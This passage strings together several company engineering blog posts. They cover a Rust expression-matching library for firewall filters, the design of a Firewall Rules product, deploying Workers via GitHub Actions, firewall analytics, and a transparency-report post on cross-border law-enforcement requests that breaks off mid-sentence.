.get_field_index(name) .map_err(|err| (LexErrorKind::UnknownField(err), name))?; Ok((field, input)) } } After that, in the ExecutionContext we allocate a fixed-size array and use these indices for resolving values during runtime:impl<'e> ExecutionContext<'e> { /// Creates an execution context associated with a given scheme. /// /// This scheme will be used for resolving any field names and indices. pub fn new<'s: 'e>(scheme: &'s Scheme) -> Self { ExecutionContext { scheme, values: vec![None; scheme.get_field_count()].into(), } } ... } This gave significant (~2x) speed ups on our standard benchmarks:Before:test matching ... bench: 2,548 ns/iter (+/- 98) test parsing ... bench: 192,037 ns/iter (+/- 21,538)After:test matching ... bench: 1,227 ns/iter (+/- 29) test parsing ... bench: 197,574 ns/iter (+/- 16,568)This change also improved the usability of our API, as any type errors are now detected and reported much earlier, when the values are just being set on the context, and not delayed until filter execution.[not] JIT compilationOf course, as with any respectable DSL, one of the other ideas we had from the beginning was “ some point we’ll add native compilation to make everything super-fast, it’s just a matter of time...”.In practice, however, native compilation is a complicated matter, but not due to lack of tools.First of all, there is question of storage for the native code. We could compile each filter statically into some sort of a library and publish to a key-value store, but that would not be easy to maintain:We would have to compile each filter to several platforms (x86-64, ARM, WASM, …).The overhead of native library formats would significantly outweigh the useful executable size, as most filters tend to be small.Each time we’d like to change our execution logic, whether to optimise it or to fix a bug, we would have to recompile and republish all the previously stored filters.Finally, even if/though we’re sure of the reliability of the chosen store, executing dynamically retrieved native code on the edge as-is is not something that can be taken lightly.The usual flexible alternative that addresses most of these issues is Just-in-Time (JIT) compilation.When you compile code directly on the target machine, you get to re-verify the input (still expressed as a restricted DSL), you can compile it just for the current platform in-place, and you never need to republish the actual rules.Looks like a perfect fit? Not quite. As with any technology, there are tradeoffs, and you only get to choose those that make more sense for your use cases. JIT compilation is no exception.First of all, even though you’re not loading untrusted code over the network, you still need to generate it into the memory, mark that memory as executable and trust that it will always contain valid code and not garbage or something worse. Depending on your choice of libraries and complexity of the DSL, you might be willing to trust it or put heavy sandboxing around, but, either way, it’s a risk that one must explicitly be willing to take.Another issue is the cost of compilation itself. Usually, when measuring the speed of native code vs interpretation, the cost of compilation is not taken into the account because it happens out of the process.With JIT compilers though, it’s different as you’re now compiling things the moment they’re used and cache the native code only for a limited time. Turns out, generating native code can be rather expensive, so you must be absolutely sure that the compilation cost doesn’t offset any benefits you might gain from the native execution speedup.I’ve talked a bit more about this at Rust Austin meetup and, I believe, this topic deserves a separate blog post so won’t go into much more details here, but feel free to check out the slides: Oh, and if you’re in Austin, you should pop into our office for the next meetup!Let’s get back to our original question: is there anything else we can do to get the best balance between security, runtime performance and compilation cost? Turns out, there is.Dynamic dispatch and closures to the rescue Introducing Fn trait!In Rust, the Fn trait and friends (FnMut, FnOnce) are automatically implemented on eligible functions and closures. In case of a simple Fn case the restriction is that they must not modify their captured environment and can only borrow from it.Normally, you would want to use it in generic contexts to support arbitrary callbacks with given argument and return types. This is important because in Rust, each function and closure implements a unique type and any generic usage would compile down to a specific call just to that function.fn just_call(me: impl Fn(), maybe: bool) { if maybe { me() } } Such behaviour (called static dispatch) is the default in Rust and is preferable for performance reasons.However, if we don’t know all the possible types at compile-time, Rust allows us to opt-in for a dynamic dispatch instead:fn just_call(me: &dyn Fn(), maybe: bool) { if maybe { me() } } Dynamically dispatched objects don't have a statically known size, because it depends on the implementation details of particular type being passed. They need to be passed as a reference or stored in a heap-allocated Box, and then used just like in a generic implementation.In our case, this allows to create, return and store arbitrary closures, and later call them as regular functions:trait Expr<'s> { fn compile(self) -> CompiledExpr<'s>; } pub(crate) struct CompiledExpr<'s>(Box<dyn 's + Fn(&ExecutionContext<'s>) -> bool>); impl<'s> CompiledExpr<'s> { /// Creates a compiled expression IR from a generic closure. pub(crate) fn new(closure: impl 's + Fn(&ExecutionContext<'s>) -> bool) -> Self { CompiledExpr(Box::new(closure)) } /// Executes a filter against a provided context with values. pub fn execute(&self, ctx: &ExecutionContext<'s>) -> bool { self.0(ctx) } } The closure (an Fn box) will also automatically include the environment data it needs for the execution.This means that we can optimise the runtime data representation as part of the “compile” process without changing the AST or the parser. For example, when we wanted to optimise IP range checks by splitting them for different IP types, we could do that without having to modify any existing structures:RhsValues::Ip(ranges) => { let mut v4 = Vec::new(); let mut v6 = Vec::new(); for range in ranges { match range.clone().into() { ExplicitIpRange::V4(range) => v4.push(range), ExplicitIpRange::V6(range) => v6.push(range), } } let v4 = RangeSet::from(v4); let v6 = RangeSet::from(v6); CompiledExpr::new(move |ctx| { match cast!(ctx.get_field_value_unchecked(field), Ip) { IpAddr::V4(addr) => v4.contains(addr), IpAddr::V6(addr) => v6.contains(addr), } }) } Moreover, boxed closures can be part of that captured environment, too. This means that we can convert each simple comparison into a closure, and then combine it with other closures, and keep going until we end up with a single top-level closure that can be invoked as a regular function to evaluate the entire filter expression.It’s turtles closures all the way down:let items = items .into_iter() .map(|item| item.compile()) .collect::<Vec<_>>() .into_boxed_slice(); match op { CombiningOp::And => { CompiledExpr::new(move |ctx| items.iter().all(|item| item.execute(ctx))) } CombiningOp::Or => { CompiledExpr::new(move |ctx| items.iter().any(|item| item.execute(ctx))) } CombiningOp::Xor => CompiledExpr::new(move |ctx| { items .iter() .fold(false, |acc, item| acc ^ item.execute(ctx)) }), } What’s nice about this approach is:Our execution is no longer tied to the AST, and we can be as flexible with optimising the implementation and data representation as we want without affecting the parser-related parts of code or output format.Even though we initially “compile” each node to a single closure, in future we can pretty easily specialise certain combinations of expressions into their own closures and so improve execution speed for common cases. All that would be required is a separate match branch returning a closure optimised for just that case.Compilation is very cheap compared to real code generation. While it might seem that allocating many small objects (one Boxed closure per expression) is not very efficient and that it would be better to replace it with some sort of a memory pool, in practice we saw a negligible performance impact.No native code is generated at runtime, which means that we execute only code that was statically verified by Rust at compile-time and compiled down to a static function. All that we do at the runtime is call existing functions with different values.Execution turns out to be faster too. This initially came as a surprise, because dynamic dispatch is widely believed to be costly and we were worried that it would get slightly worse than AST interpretation. However, it showed an immediate ~10-15% runtime improvement in benchmarks and on real examples.The only obvious downside is that each level of AST requires a separate dynamically-dispatched call instead of a single inlined code for the entire expression, like you would have even with a basic template JIT.Unfortunately, such output could be achieved only with real native code generation, and, for our case, the mentioned downsides and risks would outweigh runtime benefits, so we went with the safe & flexible closure approach.Bonus: WebAssembly supportAs was mentioned earlier, we chose Rust as a safe high-level language that allows easy integration with other parts of our stack written in Go, C and Lua via C FFI. But Rust has one more target it invests in and supports exceptionally well: WebAssembly.Why would we be interested in that? Apart from the parts of the stack where our rules would run, and the API that publishes them, we also have users who like to write their own rules. To do that, they use a UI editor that allows either writing raw expressions in Wireshark syntax or as a WYSIWYG builder.We thought it would be great to expose the parser - the same one as we use on the backend - to the frontend JavaScript for a consistent real-time editing experience. And, honestly, we were just looking for an excuse to play with WASM support in Rust.WebAssembly could be targeted via regular C FFI, but in that case you would need to manually provide all the glue for the JavaScript side to hold and convert strings, arrays and objects forth and back.In Rust, this is all handled by wasm-bindgen. While it provides various attributes and methods for direct conversions, the simplest way to get started is to activate the “serde” feature which will automatically convert types using JSON.parse, JSON.stringify and serde_json under the hood.In our case, creating a wrapper for the parser with only 20 lines of code was enough to get started and have all the WASM code + JavaScript glue required:#[wasm_bindgen] pub struct Scheme(wirefilter::Scheme); fn into_js_error(err: impl std::error::Error) -> JsValue { js_sys::Error::new(&err.to_string()).into() } #[wasm_bindgen] impl Scheme { #[wasm_bindgen(constructor)] pub fn try_from(fields: &JsValue) -> Result<Scheme, JsValue> { fields.into_serde().map(Scheme).map_err(into_js_error) } pub fn parse(&self, s: &str) -> Result<JsValue, JsValue> { let filter = self.0.parse(s).map_err(into_js_error)?; JsValue::from_serde(&filter).map_err(into_js_error) } } And by using a higher-level tool called wasm-pack, we also got automated npm package generation and publishing, for free.This is not used in the production UI yet because we still need to figure out some details for unsupported browsers, but it’s great to have all the tooling and packages ready with minimal efforts. Extending and reusing the same package, it should be even possible to run filters in Cloudflare Workers too (which also support WebAssembly).The futureThe code in the current state is already doing its job well in production and we’re happy to share it with the open-source Rust community.This is definitely not the end of the road though - we have many more fields to add, features to implement and planned optimisations to explore. If you find this sort of work interesting and would like to help us by working on firewalls, parsers or just any Rust projects at scale, give us a shout!

How we made Firewall Rules

Recently we launched Firewall Rules, a new feature that allows you to construct expressions that perform complex matching against HTTP requests and then choose how that traffic is handled. As a Firewall feature you can, of course, block traffic. The expressions we support within Firewall Rules along with powerful control over the order in which they are applied allows complex new behaviour.In this blog post I tell the story of Cloudflare’s Page Rules mechanism and how Firewall Rules came to be. Along the way I’ll look at the technical choices that led to us building the new matching engine in Rust.The evolution of the Cloudflare FirewallCloudflare offers two types of firewall for web applications, a managed firewall in the form of a WAF where we write and maintain the rules for you, and a configurable firewall where you write and maintain rules. In this article, we will focus on the configurable firewall.One of the earliest Cloudflare firewall features was the IP Access Rule. It dates backs to the earliest versions of the Cloudflare Firewall and simply allows you to block traffic from specific IP addresses:if request IP equals then block the requestAs attackers and spammers frequently launched attacks from a given network we also introduced the ASN matching capability:if request IP belongs to ASN 64496 then block the requestWe also allowed blocking ranges of addresses defined by CIDR notation when an IP was too specific and an ASN too broad:if request IP is within then block the requestBlocking is not the only action you might need and so other actions are available:Whitelist = apply no other firewall rules and allow the request to pass this part of the firewallChallenge = issue a CAPTCHA and if this is passed then allow the request but otherwise deny. This would be used to determine if the request came from a human operatorJavaScript challenge = issue an automated JavaScript challenge and if this is passed then allow the request. This would be used to determine if the request came from a simple stateless bot (perhaps a wget or curl script)Block = deny the requestCloudflare also has Page Rules. Page Rules allow you to match full URIs and then perform actions such as redirects or to raise the security level which can be considered firewall functions:if request URI matches /nullroute then redirect to also added GeoIP information within an HTTP header and the firewall was extended to include that:if request IP originates from county GB then CAPTCHA the requestAll of the above existed in Cloudflare pre-2014, and then during 2016 we set about to identify the most commonly requested firewall features (according to Customer Support tickets and feedback from paying customers) and provide a self-service solution. From that analysis, we added three new capabilities during late 2016: Rate Limiting, User Agent Rules, and Zone Lockdown.Whilst Cloudflare automatically stops very large denial of service attacks, rate limiting allowed customers to stop smaller attacks that were a real concern to them but were low enough volume that Cloudflare’s DDoS defences were not being applied.if request method is POST and request URI matches /wp-admin/index.php and response status code is 403 and more than 3 requests like this occur in a 15 minute time period then block the traffic for 2 hoursUser Agent rules are as simple as:if request user_agent is `Fake User Agent` then CAPTCHA the requestZone Lockdown, however was the first default deny feature. The Cloudflare Firewall could be thought of as “allow all traffic, except where a rule exists to block it”. Zone Lockdown is the opposite “for a given URI, block all traffic, except where a rule exists to allow it”.Zone Lockdown allowed customers could to block access to a public website for all but a few IP addresses or IP ranges. For example, many customers wanted access to a staging website to only be available to their office IP addresses.if request URI matches and request IP not in then block the requestFinally, an Enterprise customer could also contact Cloudflare and have a truly bespoke rule created for them within the WAF engine.Seeing the problemThe firewall worked well for simple mitigation, but it didn’t fully meet the needs of our customers.Each of the firewall features had targeted a single attribute, and the interfaces and implementations reflected that. Whilst the Cloudflare Firewall had evolved to solve a problem as each problem arose, these did not work together. In late 2017 you could sum up the firewall capabilities as:You can block any attack traffic on any criteria, so long as you only pick one of:IPCIDRASNCountryUser AgentURIWe saw the problem, but how to fix it?We match our firewall rules in two ways:Lookup matchingString pattern matchingLookup matching covers the IP, CIDR, ASN, Country and User Agent rules. We would create a key in our globally distributed key/value data store Quicksilver, and store the action in the value:Key = zone:www.example.com_ip: Value = blockWhen a request for is received, we look at the IP address of the client that made the request, construct the key and perform the lookup. If the key exists in the store, then the value would tell us what action to perform, in this case if the client IP were then we would block the request.Lookup matching is a joy to work with, it is O(1) complexity meaning that a single request would only perform a single lookup for an IP rule regardless of how many IP rules a customer had. Whilst most customers had a few rules, some customers had hundreds of thousands of rules (typically created automatically by combining fail2ban or similar with a Cloudflare API call).Lookups work well when you are only looking up a single value. If you need to combine an IP and a User Agent we would need to produce keys that composed these values together. This massively increases the number of keys that you need to publish.String pattern matching occurs where URI matching is required. For our Page Rules feature this meant combining all of the Page Rules into a single regular expression that we would apply to the request URI whilst handling a request.If you had Page Rules that said (in order):Match */wp-admin/index.php and then blockThen match */xmlrpc.php and then blockThese are converted into:^(?<block__1>(?:.*/wp-admin/index.php))|(?<block__2>(?:.*/xmlrpc.php))$Yes, you read that correctly. Each Page Rule was appended to a single regular expression in the order of execution, and the naming group is used as an overload for the desired action.This works surprisingly well as regular expression matching can be simple and fast especially when the regular expression matches against a single value like the URI, but as soon as you want to match the URI plus an IP range it becomes less obvious how to extend this.This is what we had, a set of features that worked really well providing you want to match a single property of a request. The implementation also meant that none of these features could be trivially extended to embrace multiple properties at a time. We needed something else, a fast way to compute if a request matches a rule that could contain multiple properties as well as pattern matching.A solution that works now and in the futureOver time Cloudflare engineers authored internal posts exploring how a new matching engine might work. The first thing that occurred to every engineer was that the matching must be an expression. These ideas followed a similar approach which we would construct an expression within JSON as a DSL (Domain Specific Language) of our expression language. This DSL could describe matching a request and a UI could render this, and a backend could process it.Early proposals looked like this:{ "And": [ { "Equals"{ "host": "" } }, "Or": [ { "Regex": { "path": "^(?: .*/wp-admin/index.php)$" } }{ "Regex": { "path": "^(?: .*/xmlrpc.php)$" } } ] ] }The JSON describes an expression that computers can easily turn into a rule to apply, but people find this hard to read and work with.As we did not wish to display JSON like this in our dashboard we thought about how we might summarise it for a UI:if request host equals and (request path matches ^(?:.*/wp-admin/index.php)$ or request path matches ^(?:.*/xmlrpc.php)$)And there came an epiphany. As engineers working we’ve seen an expression language similar to this before, so may I introduce to you our old friend Wireshark®.Wireshark is a network protocol analyzer. To use it you must run a packet capture to record network traffic from a capture device (usually a network card). This is then saved to disk as a .pcap file which you subsequently open in the Wireshark GUI. The Wireshark GUI has a display filter entry box, and when you fill in a display filter the GUI will dissect the saved packet capture such that it will determine which packets match the expression and then show those in the GUI.But we don’t need to do that. In fact, for our scenario that approach does not work as we have a firewall and need to make decisions in real-time as part of the HTTP request handling rather than via the packet capture process.For Cloudflare, we would want to use something like the expression language that is the Wireshark Display Filters but without the capture and dissection as we would want to do this potentially thousands of times per request without noticeable delay.If we were able to use a Wireshark-style expression language then we can reduce the JSON encapsulated expression above eq "" and (http.request.path ~ "wp-admin/index\.php" or http.request.path ~ "xmlrpc.php")This is human readable, machine parseable, succinct.It also benefits from being highly similar to Wireshark. For security engineers used to working with Wireshark when investigating attacks it offers a degree of portability from an investigation tool to a mitigation engine.To make this work we would need to collect the properties of the request into a simple data structure to match the expressions against. Unlike the packet capture approach we run our firewall within the context of an HTTP server and the web server has already computed the request properties, so we can avoid dissection and populate the fields from the web server knowledge: Field Value http.cookie session=8521F670545D7865F79C3D7BED C29CCE;-background=light http.referer http.request.method GET http.request.uri /articles/index?section=539061&expand=comments http.request.uri.path /articles/index http.request.uri.query section=539061&expand=comments http.user_agent Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 http.x_forwarded_for ip.src ip.geoip.asnum 64496 GB ssl true With a table of HTTP request properties and an expression language that can provide a matching expression we were 90% of the way towards a solution! All we needed for the last 90% was the matching engine itself that would provide us with an answer to the question: Does this request match one of the expressions?Enter wirefilter.Wirefilter is the name of the Rust library that Cloudflare has created, and it provides:The ability for Cloudflare to define a set of fields of types, i.e. ip.src is a field of type IPAddressThe ability to define a table of properties from all of the fields that are definedThe ability to parse an expression and to say whether it is syntactically valid, whether the fields in the expression are valid against the fields defined, and whether the operators used for a field are valid for the type of the fieldThe ability to apply an expression to a table and return a true|false response indicating whether the evaluated expression matches the requestIt is named wirefilter as a hat tip towards Wireshark for inspiring our Wireshark-like expression language and also because in our context of the Cloudflare Firewall these expressions act as a filter over traffic.The implementation of wirefilter allows us to embed this matching engine within our REST API which is written in Go:// scheme stores the list of fields and their types that an expression can use var scheme = filterexpr.Scheme{ "http.cookie": filterexpr.TypeString, "": filterexpr.TypeString, "http.referer": filterexpr.TypeString, "http.request.full_uri": filterexpr.TypeString, "http.request.method": filterexpr.TypeString, "http.request.uri": filterexpr.TypeString, "http.request.uri.path": filterexpr.TypeString, "http.request.uri.query": filterexpr.TypeString, "http.user_agent": filterexpr.TypeString, "http.x_forwarded_for": filterexpr.TypeString, "ip.src": filterexpr.TypeIP, "ip.geoip.asnum": filterexpr.TypeNumber, "": filterexpr.TypeString, "ssl": filterexpr.TypeBool, }Later we validate expressions provided to the API:// expression here is a string that may look like: // `ip.src eq` expressionHash, err := filterexpr.ValidateFilter(scheme, expression) if fve, ok := err.(*filterexpr.ValidationError); ok { validationErrs = append(validationErrs, fve.Ascii) } else if err != nil { return nil, stderrors.Errorf("failed to validate filter: %v", err) }This tells us whether the expression is syntactically correct and also whether the field operators and values match the field type. If the expression is valid then we can use the returned hash to determine uniqueness (the hash is generated inside wirefilter so that uniqueness can ignore whitespace and minor differences).The expressions are then published to our global network of PoPs and are consumed by Lua within our web proxy. The web proxy has the same list of fields that the API does, and is now responsible for building the table of properties from the context within the web proxy:-- The `traits` table defines the mapping between the fields and -- the corresponding values from the nginx evaluation context. local traits = { [''] = field.str(function(ctx) return end), ['http.cookie'] = field.str(function(ctx) local value = ctx.req_headers.cookie or '' if type(value) == 'table' then value = table.concat(value, ";") end return value end), ['http.referer'] = field.str(function(ctx) return ctx.req_headers.referer or '' end), ['http.request.method'] = field.str(function(ctx) return ctx.method end), ['http.request.uri'] = field.str(function(ctx) return ctx.rewrite_uri or ctx.request_uri end), ['http.request.uri.path'] = field.str(function(ctx) return ctx.uri or '/' end), ...With this per-request table describing a request we can see test the filters. In our case what we’re doing here is:Fetch a list of all the expressions we would like to match against the requestCheck whether any expression, when applied via wirefilter to the table above, return true as having matchedFor all matched expressions check the associated actions and their priorityThe actions are not part of the matching itself. Once we have a list of matched expressions we determine which action takes precedence and that is the one that we will execute.Wirefilter then, is a generic library that provides this matching capability that we’ve plugged into our Go APIs and our Lua web proxy, and we use that to power the Cloudflare Firewall.We chose Rust for wirefilter as early in the project we recognised that if we attempted to make implementations of this in Go and Lua, that it would result in inconsistencies that attackers may be able to exploit. We needed our API and edge proxy to behave exactly the same. For this needed a library, both could call and we could choose one of our existing languages at the edge like C, C++, Go, Lua or even implement this not as a library but as a worker in JavaScript. With a mixed set of requirements of performance, memory safety, low memory use, and the capability to be part of other products that we’re working on like Spectrum, Rust stood out as the strongest option.With a library in place and the ability to now match all HTTP traffic, how to get that to a public API and UI without diluting the capability? The problems that arose related to specificity and mutual exclusion.In the past all of our firewall rules had a single dimension to them: i.e. act on IP addresses. And this meant that we had a single property of a single type and whilst there were occasionally edge cases for the most part there were strategies to answer the question “Which is the most specific rule?”. I.e. an IP address is more specific then a /24 which is more specific than a /8. Likewise with URI matching an overly simplistic strategy is that the longer a URI the more specific it is. And if we had 2 IP rules, then only 1 could ever have matched as a request does not come from 2 IPs at once so mutual exclusion is in effect.The old system meant that given 2 rules, we could implicitly and trivially say “this rule is most specific so use the action associated with this rule”.With wirefilter powering Firewall Rules, it isn’t obvious that an IP address is more or less specific when compared to a URI. It gets even more complex when a rule can have negation, as a rule that matches a /8 is less specific than a rule that does not match a single IP (the whole address space except this IP - one of the gotchas of Firewall Rules is also a source of it’s power; you can invert your firewall into a positive security model.As we couldn’t answer specificity using the expression alone, we needed another aspect of the Firewall Rule to provide us this guidance and we realised that customers already had a mechanism to tell us which rules were important… the action.Given a set of rules, we logically have ordered them according to their action (Log has highest priority, Block has lowest):LogAllowChallenge (CAPTCHA)JavaScript ChallengeBlockFor the vast majority of scenarios this proves to be good enough.What about when that isn’t good enough though? Do we have examples of complex configuration that break that approach? Yes!Because the expression language within Firewall Rules is so powerful, and we can support many Firewall Rules, it means that we can now create different firewall configuration for different parts of a web site. i.e. /blog could have wholly different rules than /shop, or for different audiences, i.e. visitors from your office IPs might be allowed on a given URI but everyone else trying to access that URI may be blocked.In this scenario you need the ability to say “run all of these rules first, and then run the other rules”.In single machine firewalls like iptables, OS X Firewall, or your home router firewall, the firewall rules were explicitly ordered so that when you match the first rule it terminates execution and you won’t hit the next rule. When you add a new rule the entire set of rules is republished and this helps to guarantee this behaviour. But this approach does not work well for a Cloud Firewall as a large website with many web applications typically also has a large number of firewall rules. Republishing all of these rules in a single transaction can be slow and if you are adding lots of rules quickly this can lead to delays to the final state being live.If we published individual rules and supported explicit ordering, we risked race conditions where two rules that both were configured in position 4 might exist at the same time and the behaviour if they matched the request would be non-determinable.We solved this by introducing a priority value, where 1 is the highest priority and as an int32 you can create low priority rules all the way down to priority = 2147483647. Not providing a priority value is the equivalent of “lowest” and runs after all rules that have a priority.Priority does not have to be a unique value within Firewall Rules. If two rules are of equal priority then we resort to the order of precedence of the actions as defined earlier.This provides us a few benefits:Because priority allows rules that share a priority to exist we can publish rules 1 at a time… when you add a new rule the speed at which we deploy that globally is not affected by the number of rules you already have.If you do have existing rules in a system that does sequentially order the rules, you can import those into Firewall Rules and preserve their order, i.e. this rule should always run before that rule.But you don’t have to use priority exclusively for ordering as you can also use priority for grouping. For example you may say that all spammers are priority=10000 and all trolls are priority = 5000.Finally… let’s look at those fields again, http.request.path notice that http prefix? By following the naming convention Wireshark has (see their Display Filter Reference) we have not limited this firewall capability solely to a HTTP web proxy. It is a small leap to imagine that if a Spectrum  application declares itself as running SMTP that we could also define fields that understand SMTP and allow filtering of traffic on other application protocols or even at layer 4.What we have built in Firewall Rules gives us these features today:Rich expression language capable of targeting traffic precisely and in real-timeFast global deployment of individual rulesA lot of control over the management and organisation of Firewall RulesAnd in the future, we have a product that can go beyond HTTP and be a true Cloud Firewall for all protocols…the Cloudflare Firewall with Firewall Rules.

Deploying Workers with GitHub Actions + Serverless

If you weren’t aware, Cloudflare Workers, our serverless programming platform, allows you to deploy code onto our 165 data centers around the world. Want to automatically deploy Workers directly from a GitHub repository? Now you can with our official GitHub Action. This Action is an extension of our existing integration with the Serverless Framework. It runs in a containerized GitHub environment and automatically deploys your Worker to Cloudflare. We chose to utilize the Serverless Framework within our GitHub Action to raise awareness of their awesome work and to enable even more serverless applications to be built with Cloudflare Workers. This Action can be used to deploy individual Worker scripts as well; the Serverless Framework is being used in the background as the deployment mechanism.Before going into the details, we’ll quickly go over what GitHub Actions are.GitHub ActionsGitHub Actions allow you to trigger commands in reaction to GitHub events. These commands run in containers and can receive environment variables. Actions could trigger build, test, or deployment commands across a variety of providers. They can also be linked and run sequentially (i.e. ‘if the build passes, deploy the app’). Similar to many CI/CD tools, these commands run in an isolated container and receive environment variables. You can pass any command to the container that enables your development workflow.Actions are a powerful way to your workflow on GitHub, including automating parts of your deployment pipeline directly from where your codebase lives. To that end, we’ve built an Action to deploy a Worker to your Cloudflare zone via our existing Serverless Framework integration for Cloudflare Workers. To visualize the entire flow see below:To see some of the other actions out there today, please see here.Why Use the Serverless Framework?Serverless applications are deployed without developers needing to worry about provisioning hardware, capacity planning, scaling or paying for equipment when your application isn't running. Unlike most providers who ask you to choose a region for your serverless app to run in, all Cloudflare Workers deploy into our entire global network. The Serverless Framework is a popular toolkit for deploying applications that are serverless. The advantage of the Serverless Framework is that it offers a common CLI to use across multiple providers which support serverless applications. In late 2018, Cloudflare integrated Workers deployment into the Serverless CLI. Please check out our docs here to get started. If you run an entire application in a Worker, there is no cost to a business when the application is idle. If the application runs on our network (Cloudflare has 165 PoPs as of writing this), the app can be incredibly close to the end user, reducing latency by proximity. Additionally, Workers can be a powerful way to augment what you've already built in an existing technology, moving just the authentication or performance-sensitive components into Workers.ConfigurationConfiguration of the Action is straightforward, with the side benefit of giving you just a ‘little bit’™ of exposure to the Serverless Framework if desired. A repo using this Action can just contain the Worker script to be deployed. If you feed the Action the right ENV variables, we’ll take care of the rest.Alternatively you can also provide a serverless.yml in the root of your repo with your worker if you want to override the defaults. Get started learning about our integration with Serverless here.Your Worker script, and optional serverless.yml are passed into the container which runs the Action for deployment. The Serverless Framework picks up these files and deploys the Worker for you.All the relevant variables must be passed to the Action as well, which include various account identifiers as well as your API key. You can check out this tutorial from GitHub on how to pass environmental variables to an Action (hint: use the secret variable type for your API key).SupportThe repository is publicly available here which goes over the configuration in more technical detail. Any question/suggestions feel free to let us know!

New Firewall Tab and Analytics

At Cloudflare, one of our top priorities is to make our products and services intuitive so that we can enable customers to accelerate and protect their Internet properties. We're excited to launch two improvements designed to make our Firewall easier to use and more accessible, and helping our customers better manage and visualize their threat-related data. New Firewall Tabs for ease of accessWe have re-organised our features into meaningful pages: Events, Firewall Rules, Managed Rules, Tools, and Settings. Our customers will see an Overview tab, which contains our new Firewall Analytics, detailed below.All the features you know and love are still available, and can be found in one of the four new tabs. Here is a breakdown of their new locations. Feature New Location Firewall Event Log Events (Overview for Enterprise only) Firewall Rules Firewall Rules Web Application Firewall Managed Ruleset IP Access Rules (IP Firewall Tools Rate Limiting Tools User Agent Blocking Tools Zone Lockdown Tools Browser Integrity Check Settings Challenge Passage Settings Privacy Pass Settings Security Level Settings If the new sub navigation has not appeared, you may need to re-login to the dashboard or clear your browser’s cookies.New Firewall Analytics for analysing events and maintaining optimal configurationsInsights into security events are critical for monitoring the health of your web applications. Furthermore, distinguishing between actual threats from false positives is essential for maintaining an optimal security configuration. Today, we are very pleased to announce our new Firewall Analytics which will help our Enterprise customers get detailed insights into firewall events, helping them to tailor their security configurations more effectivelyOur new Firewall Analytics now enables our Enterprise customers to:visualise and analyse Firewall Events in one place to better understand their threat landscapeidentify, mitigate, and review attacks more effectivelyAfter speaking with many of our customers, we learned a lot about their processes to identify and analyse attacks and the kinds of insights they needed to improve these processes. We then translated these learnings into useful features and charts that would help answer some of the most common questions such as ‘What kinds of security events occurred in a certain time frame?’ and ‘What caused a spike in a certain type of security event?’.   Firewall Analytics and Firewall Configuration can be found together in the Firewall tab. A tight feedback loop between Firewall configuration and the resulting events allow for rapid iteration, ideal for security-focused teams.To best demonstrate the power of Firewall Analytics, here’s a workflow that  would answer a popular question our customers ask: “Why did I have a spike in threats?”. In the screenshot below, we can see a set of activity which triggered a number of ‘Blocks’ events:To minimize the possibility of polluting our TopN statistics with event types other than ‘Block’ and get the most accurate diagnostic information, we will need to filter down to just ‘Block’ actions.Now that only Block events are displayed, checking the Service Breakdowns will help us to identify which of our Firewall features was triggered.From the Events breakdown, we can see that the Block events were triggered by a Country Block configured within Access Rules. Digging deeper and looking at our TopN breakdowns, we start to get a much more granular understanding of which Networks, IPs, User-Agents, Paths etc, were targeted.Looking at our TopN breakdowns, we start to get a much more granular understanding of which Networks, IPs, User-Agents, Paths etc, were targeted.From here, we can see that there are two specific IP addresses which were targeting my application to “/”. To get the most detailed information, we can drill down further in the refreshed Firewall Event log, now controlled inline.Whilst these TopNs and filters are great for clearly identifiable threats,they can also help identify false positives. Using the power of Cloudflare’s filters, it is possible to add a user-defined filter, which can be a RayID, User-Agent or IP address.This is just one example of how the new Firewall Analytics can help expedite the process of identifying and mitigating threats. Firewall Analytics is now live for all Enterprise customers. Let us know your feedback by reaching out to your Enterprise Account Team.

Digital Evidence Across Borders and Engagement with Non-U.S. Authorities

Since we first started reporting in 2013, our transparency report has focused on requests from U.S. law enforcement. Previous versions of the report noted that, as a U.S. company, we ask non-U.S. law enforcement agencies to obtain formal U.S. legal process before providing customer data. As more countries pass laws that seek to extend beyond their national borders and as we expand into new markets, the question of how to handle requests from non-U.S. law enforcement has become more complicated. It seems timely to talk about our engagement with non-U.S. law enforcement and how our practice is changing. But first, some background on the changes that we’ve seen over the last year.Law enforcement access to data across bordersThe explosion of cloud services -- and the fact that data may be stored outside the countries of residence of those who generated it -- has been a challenge for governments conducting law enforcement investigations. A number of U.S. laws, like the Stored Communications Act or the Electronic Communications Privacy Act restrict companies from providing particular types of data, such as the content of communications, to any person or entity, including foreign law enforcement agencies, without U.S. legal process. To get access to electronic data stored outside their home borders, law enforcement agencies around the world have long used Mutual Legal Assistance Treaties (MLATs) that allow one country to ask for another country’s help to get access to evidence. Unfortunately, the MLAT process can be slow and cumbersome. Countries frustrated by the inability of law enforcement to quickly gather evidence held outside their borders have taken matters into their own hands. Some have proposed laws mandating that important data about their citizens remain in country, where it can be easily accessed when requested. Others have proposed laws that would allow law enforcement to get access to data wherever it is stored, which puts companies in the position of potentially violating one country’s laws in order to comply with another’s.In short, a new paradigm that allows law enforcement to access appropriate digital evidence across borders, with sufficient procedural safeguards to protect our users’ privacy and ensure due process, is long overdue. U.S. Cloud Act In March 2018, the U.S. Congress passed the Clarifying Lawful Overseas Use of Data (CLOUD) Act as part of a large bill funding the government. The idea behind the law is that governments that protect their citizens’ due process rights and civil liberties should be able to get access to electronic content related to their citizens when conducting law enforcement investigations, wherever that data is stored.The CLOUD Act anticipates that the U.S. government will enter into agreements with other countries’ governments to give each of the participating governments access to data stored in other participating countries for the purpose of investigating and prosecuting certain crimes. Under the law, the U.S. government will have to determine that a country has “robust substantive and procedural protections for privacy and civil liberties” before entering into an agreement with that country. After a country enters a formal agreement with the United States, U.S. companies would no longer be restricted by U.S. law from providing that country’s law enforcement with access to content data in response to a valid law enforcement request. From a practical standpoint, the CLOUD Act envisions that U.S. companies like Cloudflare will be providing information directly to governments that have entered into agreements with the U.S. government. The idea is to change the relevant question away from “where is the data stored?” to “is the person being investigated a citizen or resident of the country asking for the information?”, recognizing every government’s right to investigate crimes that occur within its borders or affect its citizens.Movement in EuropeGovernments outside the United States have also moved forward with proposals that would provide law enforcement agencies authority to obtain information related to their citizens across borders. The United Kingdom, for example, has been working to update their laws and negotiate a bilateral agreement with the United States for access to data maintained by U.S. companies, consistent with the framework established in the CLOUD Act.The European Union has also been active in moving forward with a framework on obtaining electronic evidence across borders. Much like the U.S. CLOUD Act, the European Commission’s eEvidence Regulation would allow EU Member States to seek digital evidence outside of their national borders provided that fundamental rights are protected. The European Commission also envisions entering into negotiations with U.S. authorities on data sharing arrangements under the mandate of EU Member States. So where does all of this leave us?As a 